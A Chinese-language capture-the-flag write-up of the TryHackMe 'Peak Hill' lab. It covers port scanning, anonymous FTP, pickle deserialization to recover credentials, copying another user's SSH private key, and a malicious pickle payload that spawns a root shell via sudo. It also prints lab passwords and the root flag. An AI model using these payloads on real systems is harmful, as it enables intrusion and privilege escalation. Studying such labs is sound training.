打靶记录(一一零)之THMPeakHill

端口扫描

nmap --min-rate=10000 -p- 10.10.2.217
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-21 15:34 UTC
Nmap scan report for ip-10-10-12-153.eu-west-1.compute.internal (10.10.2.217)
Host is up (0.022s latency).
Not shown: 65531 filtered tcp ports (no-response)
PORT     STATE  SERVICE
20/tcp   closed ftp-data
21/tcp   open   ftp
22/tcp   open   ssh
7321/tcp open   swx
MAC Address: 02:AE:DB:BF:76:C3 (Unknown)

Nmap done: 1 IP address (1 host up) scanned in 13.79 seconds

nmap -sC -sT -sV -O -p21,22,7321 10.10.2.217
Starting Nmap 7.93 ( https://nmap.org ) at 2024-03-21 15:36 UTC
Nmap scan report for ip-10-10-12-153.eu-west-1.compute.internal (10.10.2.217)
Host is up (0.00039s latency).

PORT     STATE SERVICE VERSION
21/tcp   open  ftp     vsftpd 3.0.3
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r--    1 ftp      ftp            17 May 15  2020 test.txt
| ftp-syst: 
|   STAT: 
| FTP server status:
|      Connected to ::ffff:10.10.102.118
|      Logged in as ftp
|      TYPE: ASCII
|      No session bandwidth limit
|      Session timeout in seconds is 300
|      Control connection is plain text
|      Data connections will be plain text
|      At session startup, client count was 3
|      vsFTPd 3.0.3 - secure, fast, stable
|_End of status
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 04d5759dc1405137734c423038b8d6df (RSA)
|   256 7f951ad7592f1906eac155ec58350c05 (ECDSA)
|_  256 a51536921caa599b8ad8ea13c9c0ffb6 (ED25519)
7321/tcp open  swx?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, JavaRMI, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NotesRPC, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, WMSRequest, X11Probe, afp, giop, ms-sql-s, oracle-tns: 
|     Username: Password:
|   NULL: 
|_    Username:
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port7321-TCP:V=7.93%I=7%D=3/21%Time=65FC53ED%P=x86_64-pc-linux-gnu%r(NU
SF:LL,A,"Username:\x20")%r(GenericLines,14,"Username:\x20Password:\x20")%r
SF:(GetRequest,14,"Username:\x20Password:\x20")%r(HTTPOptions,14,"Username
SF::\x20Password:\x20")%r(RTSPRequest,14,"Username:\x20Password:\x20")%r(R
SF:PCCheck,14,"Username:\x20Password:\x20")%r(DNSVersionBindReqTCP,14,"Use
SF:rname:\x20Password:\x20")%r(DNSStatusRequestTCP,14,"Username:\x20Passwo
SF:rd:\x20")%r(Help,14,"Username:\x20Password:\x20")%r(SSLSessionReq,14,"U
SF:sername:\x20Password:\x20")%r(TerminalServerCookie,14,"Username:\x20Pas
SF:sword:\x20")%r(TLSSessionReq,14,"Username:\x20Password:\x20")%r(Kerbero
SF:s,14,"Username:\x20Password:\x20")%r(SMBProgNeg,14,"Username:\x20Passwo
SF:rd:\x20")%r(X11Probe,14,"Username:\x20Password:\x20")%r(FourOhFourReque
SF:st,14,"Username:\x20Password:\x20")%r(LPDString,14,"Username:\x20Passwo
SF:rd:\x20")%r(LDAPSearchReq,14,"Username:\x20Password:\x20")%r(LDAPBindRe
SF:q,14,"Username:\x20Password:\x20")%r(SIPOptions,14,"Username:\x20Passwo
SF:rd:\x20")%r(LANDesk-RC,14,"Username:\x20Password:\x20")%r(TerminalServe
SF:r,14,"Username:\x20Password:\x20")%r(NCP,14,"Username:\x20Password:\x20
SF:")%r(NotesRPC,14,"Username:\x20Password:\x20")%r(JavaRMI,14,"Username:\
SF:x20Password:\x20")%r(WMSRequest,14,"Username:\x20Password:\x20")%r(orac
SF:le-tns,14,"Username:\x20Password:\x20")%r(ms-sql-s,14,"Username:\x20Pas
SF:sword:\x20")%r(afp,14,"Username:\x20Password:\x20")%r(giop,14,"Username
SF::\x20Password:\x20");
MAC Address: 02:AE:DB:BF:76:C3 (Unknown)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X
OS CPE: cpe:/o:linux:linux_kernel:3
OS details: Linux 3.10 - 3.13
Network Distance: 1 hop
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.39 seconds

Getshell

FTP可以匿名登录

ftp 10.10.2.217                   
Connected to 10.10.2.217.
220 (vsFTPd 3.0.3)
Name (10.10.2.217:mikannse): anonymous
331 Please specify the password.
Password: 
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> binary
200 Switching to Binary mode.
ftp> ls -a
229 Entering Extended Passive Mode (|||24251|)
150 Here comes the directory listing.
drwxr-xr-x    2 ftp      ftp          4096 May 15  2020 .
drwxr-xr-x    2 ftp      ftp          4096 May 15  2020 ..
-rw-r--r--    1 ftp      ftp          7048 May 15  2020 .creds
-rw-r--r--    1 ftp      ftp            17 May 15  2020 test.txt

.cred是一串二进制码，解码之后得到一串ssh_xxx的不明字符,根据房间提示，尝试进行反序列化

import pickle

with open('./download.dat', 'rb') as file:  
    file_content = file.read() 

result = pickle.loads(file_content)
print(result)

得到一堆数组，慢慢拼出user和passwd:

gherkin:p1ckl3s_@11_@r0und_th3_w0rld

可以ssh登录,家目录有一个pyc文件，可以尝试反编译

scp gherkin@10.10.2.217:/home/gherkin/cmd_service.pyc .

https://tool.lu/pyc/ 直接线上反编译

发现是开在7321端口的服务的源码，并且在上方发现了用户和密码

from Crypto.Util.number import bytes_to_long, long_to_bytes
username = long_to_bytes(1684630636)
password = long_to_bytes(0x6E337633725F405F64316C6C5F6D306D336E74)
print(username.decode())
print(password.decode())

得到:dill:n3v3r_@_d1ll_m0m3nt

nc 10.10.2.217 7321

可以执行命令

cp /home/dill/.ssh/id_rsa /tmp/key
chmod 777 /tmp/key

scp gherkin@10.10.2.217:/tmp/key .

用私钥进行ssh登录

提权

sudo -l
Matching Defaults entries for dill on ubuntu-xenial:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User dill may run the following commands on ubuntu-xenial:
    (ALL : ALL) NOPASSWD: /opt/peak_hill_farm/peak_hill_farm

执行之后接收一个base64，根据房间的反序列化提示，构造一个payload

import pickle, os,base64

class SerializedPickle(object):
    def __reduce__(self):
        return(os.system,("/bin/bash",))

payload=base64.b64encode(pickle.dumps(SerializedPickle()))
print(payload)

输入后拿到root的shell

然而这个root.txt非常鸡贼前面加了一个奇怪的字符，可以利用ssh登录root

root@ubuntu-xenial:~# stat * 
  File: ' root.txt '
  Size: 33              Blocks: 8          IO Block: 4096   regular file
Device: ca01h/51713d    Inode: 8094        Links: 1
Access: (0440/-r--r-----)  Uid: (    0/    root)   Gid: (    0/    root)
Access: 2020-05-18 23:10:25.296000000 +0000
Modify: 2020-05-15 18:38:19.003979890 +0000
Change: 2020-05-18 23:10:40.644000000 +0000
 Birth: -
root@ubuntu-xenial:~# cat ' root.txt '
e88f0a01135c05cf0912cf4bc335ee28

碎碎念

还算比较简单的房间吧，基本上都是学过的东西